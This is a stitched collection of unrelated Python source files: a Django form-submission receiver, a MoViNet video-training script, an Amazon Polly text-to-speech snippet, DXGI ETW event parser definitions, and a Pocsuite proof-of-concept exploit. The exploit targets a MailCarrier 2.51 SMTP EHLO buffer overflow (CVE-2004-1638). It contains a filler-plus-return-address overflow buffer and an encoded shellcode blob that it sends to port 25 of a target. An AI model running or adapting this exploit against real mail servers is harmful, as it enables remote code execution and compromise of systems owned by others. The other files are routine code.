from datetime import datetime  # needed by new_submission below (unless re-exported by `from models import *`)
from django.db import transaction
from receiver.models import _XFORM_URI
def get_submission_path():
return settings.RAPIDSMS_APPS['receiver']['xform_submission_path']
def save_legacy_blob(submission, rawpayload):
'''
Saves a legacy raw formed blob POST to a file. Assumes the body of the post is
    in the raw_post_data of the request, and the metadata is a hash of the headers.
If the content-length is not present it will assume the size
of the payload is the content length.
If the content-type is not present it will assume "text/xml".
No return value. This is just a separate function to save the legacy blob to the filesystem
'''
submit_guid = submission.transaction_uuid
try:
newfilename = os.path.join(get_submission_path(), submit_guid + '.postdata')
logging.debug("Begin write of legacy blob file")
fout = open(newfilename, 'wb')
fout.write('Content-type: %s\n' % submission.content_type.replace("'newdivider'","newdivider"))
fout.write('Content-length: %s\n\n' % submission.bytes_received)
fout.write(rawpayload)
fout.close()
        #file write successful, let's update the submission with the new checksum
submission.raw_post = newfilename
submission.save()
logging.debug("Legacy blob write successful")
except:
logging.error("Unable to write raw post data: Exception " + str(sys.exc_info()[0]) + " Traceback: " + str(sys.exc_info()[1]))
# these are HARD errors. Don't swallow them.
raise
@transaction.commit_on_success
def new_submission(metadata, checksum, domain=None, is_resubmission=False):
'''Saves the actual db models for the submission and attachment objects.
Should be called after calling the save_raw_post_file method on a submission.
Any post-save hooks are probably called from this method as well.
Arguments:
metadata = request metadata dictionary
checksum = checksum value to be set with the primary content.
domain = domain doing the submission
is_resubmission = if the submission is being resubmitted from the filesystem
'''
new_submit = Submission()
new_submit.transaction_uuid = str(uuid.uuid1())
if is_resubmission:
new_submit.submit_ip = metadata['HTTP_ORIGINAL_IP']
new_submit.submit_time = datetime.strptime(metadata['HTTP_TIME_RECEIVED'], "%Y-%m-%d %H:%M:%S")
else:
if metadata.has_key('HTTP_X_FORWARDED_FOR'):
new_submit.submit_ip = metadata['HTTP_X_FORWARDED_FOR']
elif metadata.has_key('REMOTE_HOST') and len(metadata['REMOTE_HOST'])>0:
new_submit.submit_ip = metadata['REMOTE_HOST']
else:
new_submit.submit_ip = '127.0.0.1'
#dmyung - split up the ip address field if it's been appended. something we ran into depending on some gateways
#from our understanding the rightmost should be the originating/external IP
if len(new_submit.submit_ip.split(',')) > 1:
new_submit.submit_ip = new_submit.submit_ip.split(',')[-1]
if metadata.has_key('HTTP_CONTENT_TYPE'):
new_submit.content_type = metadata['HTTP_CONTENT_TYPE']
elif metadata.has_key('CONTENT_TYPE'):
new_submit.content_type = metadata['CONTENT_TYPE']
else:
new_submit.content_type = "text/xml"
if metadata.has_key('HTTP_CONTENT_LENGTH'):
new_submit.bytes_received = int(metadata['HTTP_CONTENT_LENGTH'])
elif metadata.has_key('CONTENT_LENGTH'):
new_submit.bytes_received = int(metadata['CONTENT_LENGTH'])
new_submit.raw_header = repr(metadata)
new_submit.domain = domain
new_submit.checksum = checksum
new_submit.save()
logging.debug("Raw submission save successful")
return new_submit
def new_attachment(submission, payload, content_type, attach_uri, outfilename, *args, **kwargs):
"""Simple wrapper method to save an attachment.
This probably should be an override of the constructor for attachment"""
new_attach = Attachment()
new_attach.submission = submission
new_attach.filesize = len(payload)
new_attach.checksum = hashlib.md5(payload).hexdigest()
new_attach.attachment_content_type = content_type
new_attach.attachment_uri = attach_uri
fout = open(os.path.join(settings.RAPIDSMS_APPS['receiver']['attachments_path'], outfilename),'wb')
fout.write(payload)
fout.close()
new_attach.filepath = os.path.join(settings.RAPIDSMS_APPS['receiver']['attachments_path'], outfilename)
new_attach.save()
return new_attach
@transaction.commit_on_success
def handle_legacy_blob(submission):
"""
Process attachments for a given submission blob.
Will try to use the email parsing library to get all the MIME content from a given submission
And write to file and make new Attachment entries linked back to this Submission"""
# only process attachments on newly created instances, not all of them
parts_dict = {}
if submission.raw_post == None:
logging.error("Attempting to parse a legacy submission but no legacy blob exists in the filesystem!")
raise
fin = open(submission.raw_post,'rb')
body = fin.read()
fin.close()
parsed_message = email.message_from_string(body)
for part in parsed_message.walk():
try:
if part.get_content_type() == 'multipart/mixed':
logging.debug("Multipart part")
else:
content_type = part.get_content_type()
# data submitted from the webui is always 'multipart'
if content_type.startswith('text/') or content_type.startswith('multipart/form-data'):
uri = _XFORM_URI
filename = submission.transaction_uuid + '-xform.xml'
else:
logging.debug("non XML section: %s" % part['Content-ID'])
uri = part['Content-ID']
#the URIs in the j2me submissions are local file URIs to the phone. we will get the filename from the end of the string
filename='%s-%s' % (submission.transaction_uuid, os.path.basename(uri))
payload = part.get_payload().strip()
attachment = new_attachment(submission, payload, content_type, uri, filename)
parts_dict[uri] = attachment
logging.debug("Attachment Save complete")
except Exception, e:
type, value, tb = sys.exc_info()
logging.error("Attachment Parsing Error!!! Traceback: " + type.__name__ + ":" + str(value) + " " + string.join(traceback.format_tb(tb),' '))
return {}
return parts_dict
@transaction.commit_on_success
def handle_multipart_form(submission, request_files):
"""This is a method for processing the multipart/form-data that ODK submits its data.
Eventually HQ should receive this information as the default way to transport the xforms, as it is more intuitive
to the server and the developer alike.
"""
parts_dict = {}
try:
#special case, we parse out the xform first and foremost
xformobj = request_files['xml_submission_file']
xform_filename = submission.transaction_uuid + '-xform.xml'
parts_dict['xform'] = new_attachment(submission, xformobj.read(), xformobj.content_type, 'xform', xform_filename)
except Exception, e:
logging.debug("Catching any duplicate saving errors")
#next, pop out the xform we just parsed out, and walk through other attachments if need be and do the same
otherfiles = request_files.keys()
otherfiles.remove('xml_submission_file')
for fkey in otherfiles:
try:
f = request_files[fkey]
part_filename = submission.transaction_uuid + '-' + f.name
parts_dict[f.name] = new_attachment(submission, f.read(), f.content_type, f.name, part_filename)
except Exception, e:
logging.debug("Catching any other attachment issues")
return parts_dict
|
StarcoderdataPython
|
3520537
|
<filename>train_test.py
import torch
import torchvision
import datasets
import transforms
import train
import time
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import random_split, DataLoader
from movinets import MoViNet
from movinets.config import _C
dataset_train = datasets.VideoLabelDataset(
"file/class2_train_faint.csv",
transform=torchvision.transforms.Compose([
transforms.VideoFilePathToTensor(max_len=16, fps=30, padding_mode='last'),
transforms.VideoRandomCrop([172, 172]),
transforms.VideoResize([172, 172]),
])
)
dataset_test = datasets.VideoLabelDataset(
"file/class2_test_faint.csv",
transform=torchvision.transforms.Compose([
transforms.VideoFilePathToTensor(max_len=16, fps=30, padding_mode='last'),
transforms.VideoRandomCrop([172, 172]),
transforms.VideoResize([172, 172]),
])
)
data_loader_train = torch.utils.data.DataLoader(dataset_train, batch_size = 16, shuffle = True)
data_loader_test = torch.utils.data.DataLoader(dataset_test, batch_size = 16, shuffle = False)
torch.cuda.empty_cache()
model = MoViNet(_C.MODEL.MoViNetA0, causal = False, pretrained = True )
start_time = time.time()
trloss_val, tsloss_val = [], []
#class number = 2
model.classifier[3] = torch.nn.Conv3d(2048, 2, (1,1,1)) # class number
#model load
#model.load_state_dict(torch.load('./model_data/class4/Movinet_class4_preY_last_9.pth'))
# print(model)
##train
print("start ")
optimz = optim.Adam(model.parameters(), lr=0.00005)
for epoch in range(1, 9):
print('Epoch:', epoch)
train.train_iter(model, optimz, data_loader_train, trloss_val)
#model save
#torch.save(model.state_dict(),'./model_data/class4/Movinet_class4_preY_last_{}.pth'.format(epoch+1))
    #model evaluate
train.evaluate(model,data_loader_test, tsloss_val)
print('Execution time:', '{:5.2f}'.format(time.time() - start_time), 'seconds')
|
StarcoderdataPython
|
4887234
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import struct
import socket,re
def make_overflow_dummy(overflow_len, retaddr):
return 'A' * overflow_len + struct.pack('<L', retaddr)
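
# Payload layout produced above: `overflow_len` filler bytes followed by the
# 4-byte return address packed little-endian ('<L'), the classic saved-EIP
# overwrite for a stack-based overflow.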
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
buffer = make_overflow_dummy(5097, 0x7d17dd13) + '\x41' * 32 + sc2
def poc(url):
ip = re.findall(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b", url)
try:
s.connect((ip[0],25))
s.send('EHLO ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
return True
except:
return False
class TestPOC(POCBase):
    name = 'MailCarrier SMTP service remote buffer overflow vulnerability'
vulID = 'CVE-2004-1638'
author = ['sxd']
vulType = 'buffer-overflow'
version = '1.0' # default version: 1.0
references = ['http://www.nsfocus.net/vulndb/7052']
    desc = '''
    MailCarrier SMTP server is a full-featured SMTP service program.
    MailCarrier SMTP server mishandles the EHLO/HELO commands: a remote attacker can overflow a buffer in the service process and potentially execute arbitrary instructions with the privileges of the process.
    Submitting an EHLO/HELO command with an overlong argument triggers the overflow, and carefully crafted data may allow arbitrary code execution.
    '''
vulDate = '2020-03-30'
createDate = '2020-03-30'
updateDate = '2020-03-30'
appName = 'MailCarrier'
appVersion = 'TABS LABORATORIES MailCarrier 2.51'
appPowerLink = ''
samples = ['struct',"socket"]
def _attack(self):
'''attack mode'''
return self._verify()
def _verify(self):
'''verify mode'''
result = {}
response = poc(self.url)
if response:
result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' MailCarrier SMTP remote buffer overflow vulnerability exists!'
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
|
StarcoderdataPython
|
11310812
|
import boto3
polly = boto3.client('polly')
# Use Amazon Polly to convert text to speech
res = polly.synthesize_speech(
Text = "Hello, how are you?",
OutputFormat = 'mp3',
VoiceId = 'Joanna')
# Save the response from Amazon Polly into the mp3 file
audiofile = 'myaudio.mp3'
with open(audiofile, 'wb') as f:
    f.write(res['AudioStream'].read())
# Play the mp3 file
import IPython
IPython.display.Audio(audiofile)
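
# Note: IPython.display.Audio renders an inline player only inside a
# Jupyter/IPython session; in a plain script the mp3 is still written to
# disk and can be played with any external player.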
|
StarcoderdataPython
|
331018
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-DXGI
GUID : ca11c036-0102-4a2d-a6ad-f03cfed5d3c9
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=1, version=0)
class Microsoft_Windows_DXGI_1_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"Mode" / Int32ul,
"BlockedAdapters" / Int32ul,
"PnPID" / WString,
"DriverVersion" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=2, version=0)
class Microsoft_Windows_DXGI_2_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"Mode" / Int32ul,
"BlockedAdapters" / Int32ul,
"PnPID" / WString,
"DriverVersion" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=3, version=0)
class Microsoft_Windows_DXGI_3_0(Etw):
pattern = Struct(
"pIDXGIFactory" / Int64ul,
"Mode" / Int32ul,
"BlockedAdapters" / Int32ul,
"PnPID" / WString,
"DriverVersion" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=4, version=0)
class Microsoft_Windows_DXGI_4_0(Etw):
pattern = Struct(
"pIDXGIAdapter" / Int64ul,
"pIDXGIFactory" / Int64ul,
"KMTAdapterHandle" / Int32ul,
"ThunkDLLHandle" / Int64ul,
"SharedResources" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=5, version=0)
class Microsoft_Windows_DXGI_5_0(Etw):
pattern = Struct(
"pIDXGIAdapter" / Int64ul,
"pIDXGIFactory" / Int64ul,
"KMTAdapterHandle" / Int32ul,
"ThunkDLLHandle" / Int64ul,
"SharedResources" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=6, version=0)
class Microsoft_Windows_DXGI_6_0(Etw):
pattern = Struct(
"pIDXGIAdapter" / Int64ul,
"pIDXGIFactory" / Int64ul,
"KMTAdapterHandle" / Int32ul,
"ThunkDLLHandle" / Int64ul,
"SharedResources" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=7, version=0)
class Microsoft_Windows_DXGI_7_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"pIDXGIAdapter" / Int64ul,
"VidPnSourceID" / Int32ul,
"GDIDeviceName" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=8, version=0)
class Microsoft_Windows_DXGI_8_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"pIDXGIAdapter" / Int64ul,
"VidPnSourceID" / Int32ul,
"GDIDeviceName" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=9, version=0)
class Microsoft_Windows_DXGI_9_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"pIDXGIAdapter" / Int64ul,
"VidPnSourceID" / Int32ul,
"GDIDeviceName" / WString
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=10, version=0)
class Microsoft_Windows_DXGI_10_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"pIDXGIFactory" / Int64ul,
"pIDXGIDevice" / Int64ul,
"pIDXGIOutput" / Int64ul,
"UserBackbufferCount" / Int8ul,
"BackbufferCount" / Int8ul,
"ppBackBuffers" / Int64ul,
"pPrimary" / Int64ul,
"pProxyPrimary" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"SampleCount" / Int32ul,
"SampleQuality" / Int32ul,
"Usage" / Int32ul,
"OutputWindow" / Int64ul,
"Windowed" / Int8ul,
"SwapEffect" / Int32ul,
"Flags" / Int32ul,
"Redirected" / Int8ul,
"LogicalSurfaceHandle" / Int64ul,
"BindId" / Int64ul,
"BackbufferHandles" / Int64ul,
"BackbufferEventHandles" / Int64ul,
"FenceHandle" / Int64ul,
"FenceValue" / Int64ul,
"ActualBufferCount" / Int8ul,
"ActualSwapEffect" / Int32ul,
"WinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=11, version=0)
class Microsoft_Windows_DXGI_11_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"pIDXGIFactory" / Int64ul,
"pIDXGIDevice" / Int64ul,
"pIDXGIOutput" / Int64ul,
"UserBackbufferCount" / Int8ul,
"BackbufferCount" / Int8ul,
"ppBackBuffers" / Int64ul,
"pPrimary" / Int64ul,
"pProxyPrimary" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"SampleCount" / Int32ul,
"SampleQuality" / Int32ul,
"Usage" / Int32ul,
"OutputWindow" / Int64ul,
"Windowed" / Int8ul,
"SwapEffect" / Int32ul,
"Flags" / Int32ul,
"Redirected" / Int8ul,
"LogicalSurfaceHandle" / Int64ul,
"BindId" / Int64ul,
"BackbufferHandles" / Int64ul,
"BackbufferEventHandles" / Int64ul,
"FenceHandle" / Int64ul,
"FenceValue" / Int64ul,
"ActualBufferCount" / Int8ul,
"ActualSwapEffect" / Int32ul,
"WinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=12, version=0)
class Microsoft_Windows_DXGI_12_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"pIDXGIFactory" / Int64ul,
"pIDXGIDevice" / Int64ul,
"pIDXGIOutput" / Int64ul,
"UserBackbufferCount" / Int8ul,
"BackbufferCount" / Int8ul,
"ppBackBuffers" / Int64ul,
"pPrimary" / Int64ul,
"pProxyPrimary" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"SampleCount" / Int32ul,
"SampleQuality" / Int32ul,
"Usage" / Int32ul,
"OutputWindow" / Int64ul,
"Windowed" / Int8ul,
"SwapEffect" / Int32ul,
"Flags" / Int32ul,
"Redirected" / Int8ul,
"LogicalSurfaceHandle" / Int64ul,
"BindId" / Int64ul,
"BackbufferHandles" / Int64ul,
"BackbufferEventHandles" / Int64ul,
"FenceHandle" / Int64ul,
"FenceValue" / Int64ul,
"ActualBufferCount" / Int8ul,
"ActualSwapEffect" / Int32ul,
"WinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=40, version=0)
class Microsoft_Windows_DXGI_40_0(Etw):
pattern = Struct(
"Event" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=41, version=0)
class Microsoft_Windows_DXGI_41_0(Etw):
pattern = Struct(
"Event" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=42, version=0)
class Microsoft_Windows_DXGI_42_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Flags" / Int32ul,
"SyncInterval" / Int32ul,
"DirtyRects" / Int32ul,
"ScrollRects" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=43, version=0)
class Microsoft_Windows_DXGI_43_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=44, version=0)
class Microsoft_Windows_DXGI_44_0(Etw):
pattern = Struct(
"ReturnValue" / Int32ul,
"PresentCount" / Int32ul,
"PresentRefreshCount" / Int32ul,
"SyncRefreshCount" / Int32ul,
"SyncQPCTime" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=45, version=0)
class Microsoft_Windows_DXGI_45_0(Etw):
pattern = Struct(
"pIDXGISwapchain" / Int64ul,
"OldUserBackbufferCount" / Int8ul,
"OldBackbufferCount" / Int8ul,
"ppOldBackBuffers" / Int64ul,
"pOldPrimary" / Int64ul,
"pOldProxyPrimary" / Int64ul,
"OldWidth" / Int32ul,
"OldHeight" / Int32ul,
"OldFormat" / Int32ul,
"OldFlags" / Int32ul,
"OldRedirected" / Int8ul,
"OldLogicalSurfaceHandle" / Int64ul,
"OldBackbufferHandles" / Int64ul,
"OldFenceHandle" / Int64ul,
"OldFenceValue" / Int64ul,
"OldActualbufferCount" / Int8ul,
"OldWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=46, version=0)
class Microsoft_Windows_DXGI_46_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"ReturnValue" / Int32ul,
"NewUserBackbufferCount" / Int8ul,
"NewBackbufferCount" / Int8ul,
"ppNewBackBuffers" / Int64ul,
"pNewPrimary" / Int64ul,
"pNewProxyPrimary" / Int64ul,
"NewWidth" / Int32ul,
"NewHeight" / Int32ul,
"NewFormat" / Int32ul,
"NewFlags" / Int32ul,
"NewRedirected" / Int8ul,
"NewLogicalSurfaceHandle" / Int64ul,
"NewBackbufferHandles" / Int64ul,
"NewFenceHandle" / Int64ul,
"NewFenceValue" / Int64ul,
"NewActualbufferCount" / Int8ul,
"NewWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=47, version=0)
class Microsoft_Windows_DXGI_47_0(Etw):
pattern = Struct(
"pDXGISwapChain" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"RefreshNumerator" / Int32ul,
"RefreshDenominator" / Int32ul,
"Format" / Int32ul,
"ScanlineOrdering" / Int32ul,
"Scaling" / Int32ul,
"Windowed" / Int8ul,
"pOldPrimary" / Int64ul,
"pOldProxyPrimary" / Int64ul,
"OldWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=48, version=0)
class Microsoft_Windows_DXGI_48_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"ReturnValue" / Int32ul,
"pNewPrimary" / Int64ul,
"pNewProxyPrimary" / Int64ul,
"NewWinFlipProxyBufferCount" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=49, version=0)
class Microsoft_Windows_DXGI_49_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"OldWindowed" / Int8ul,
"pOldOutput" / Int64ul,
"pOldPrimary" / Int64ul,
"pOldProxyPrimary" / Int64ul,
"OldWinFlipProxyBufferCount" / Int8ul,
"OldSwapEffect" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=50, version=0)
class Microsoft_Windows_DXGI_50_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"ReturnValue" / Int32ul,
"NewWindowed" / Int8ul,
"pNewOutput" / Int64ul,
"pNewPrimary" / Int64ul,
"pNewProxyPrimary" / Int64ul,
"NewWinFlipProxyBufferCount" / Int8ul,
"NewSwapEffect" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=51, version=0)
class Microsoft_Windows_DXGI_51_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"WidthToMatch" / Int32ul,
"HeightToMatch" / Int32ul,
"RefreshNumeratorToMatch" / Int32ul,
"RefreshDenominatorToMatch" / Int32ul,
"FormatToMatch" / Int32ul,
"ScanlineOrderingToMatch" / Int32ul,
"ScalingToMatch" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=52, version=0)
class Microsoft_Windows_DXGI_52_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"ReturnValue" / Int32ul,
"WidthResult" / Int32ul,
"HeightResult" / Int32ul,
"RefreshNumeratorResult" / Int32ul,
"RefreshDenominatorResult" / Int32ul,
"FormatResult" / Int32ul,
"ScanlineOrderingResult" / Int32ul,
"ScalingResult" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=53, version=0)
class Microsoft_Windows_DXGI_53_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"NewRedirected" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=54, version=0)
class Microsoft_Windows_DXGI_54_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"BackBufferNumber" / Int32ul,
"BackBufferHandle" / Int64ul,
"BackBufferEventHandle" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=55, version=0)
class Microsoft_Windows_DXGI_55_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Flags" / Int32ul,
"SyncInterval" / Int32ul,
"NumPlanes" / Int32ul,
"LayerMask" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=56, version=0)
class Microsoft_Windows_DXGI_56_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=57, version=0)
class Microsoft_Windows_DXGI_57_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"NumPlanes" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=58, version=0)
class Microsoft_Windows_DXGI_58_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=59, version=0)
class Microsoft_Windows_DXGI_59_0(Etw):
pattern = Struct(
"pIDXGIOutput" / Int64ul,
"MaxPlanes" / Int32ul,
"OverlayMaxRGBPlanes" / Int32ul,
"OverlayMaxYUVPlanes" / Int32ul,
"OverlayCaps" / Int32ul,
"PanelFitterMaxRGBPlanes" / Int32ul,
"PanelFitterCaps" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=60, version=0)
class Microsoft_Windows_DXGI_60_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"LayerIndex" / Int32ul,
"Enabled" / Int8ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=61, version=0)
class Microsoft_Windows_DXGI_61_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"KernelSupport" / Int8ul,
"DriverFailed" / Int8ul,
"InvalidParam" / Int8ul,
"NumPlanes" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=62, version=0)
class Microsoft_Windows_DXGI_62_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"hResource" / Int64ul,
"SubResourceIndex" / Int32ul,
"Flags" / Int32ul,
"SrcRectleft" / Int32ul,
"SrcRectright" / Int32ul,
"SrcRecttop" / Int32ul,
"SrcRectbottom" / Int32ul,
"DstRectleft" / Int32ul,
"DstRectright" / Int32ul,
"DstRecttop" / Int32ul,
"DstRectbottom" / Int32ul,
"ClipRectleft" / Int32ul,
"ClipRectright" / Int32ul,
"ClipRecttop" / Int32ul,
"ClipRectbottom" / Int32ul,
"Blend" / Int32ul,
"ColorSpace" / Int32ul,
"StretchQuality" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=63, version=0)
class Microsoft_Windows_DXGI_63_0(Etw):
pattern = Struct(
"pIDXGISwapChain" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul,
"DXGIFormat" / Int32ul
)
